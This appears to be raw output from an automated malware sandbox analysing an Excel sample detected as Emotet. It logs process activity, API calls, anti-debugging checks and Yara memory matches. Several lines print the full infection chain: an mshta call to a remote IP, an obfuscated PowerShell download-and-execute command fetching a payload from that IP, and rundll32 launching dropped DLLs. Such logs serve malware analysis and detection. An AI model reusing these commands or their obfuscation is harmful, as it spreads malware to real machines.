                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe TID: 1976Thread sleep time: -360000s >= -30000s
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: rundll32.exe, 0000000D.00000002.620246507.00000000006FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00694087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00384087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C4087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00234087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00314087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00404087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer
                            Source: Yara matchFile source: CJ68000754184.xls, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\Desktop\CJ68000754184.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003DAA7 cpuid
                            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 10.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4b0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2410000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.29e0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.4b0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2ed0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3180000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3110000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2920000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2870000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a00000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.970000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.940000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2870000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e10000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.30e0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.340000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3f0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2870000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2de0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.680000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.360000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.4b0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.390000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2de0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2790000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2650000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.480000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.28e0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2410000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3110000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2920000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a00000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.27b0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.4a0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.30e0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3110000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.360000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.22f0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.4a0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.480000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.940000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619911631.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620976859.0000000003111000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620028804.0000000000391000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679099785.0000000000971000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679434577.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561150759.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679378273.0000000002920000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561065386.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.684161589.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561626313.0000000003110000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561662235.0000000003181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561110360.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620781732.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623291568.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561451631.0000000002871000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561377294.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620753571.00000000028E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563561570.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623338464.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561295967.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679539755.0000000002E71000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678957905.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620558528.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620134635.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.560945911.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561541228.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561700746.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619872548.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679306140.0000000002791000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679166369.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561513666.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678995791.0000000000480000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678823543.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561271615.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504836959.0000000000250000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
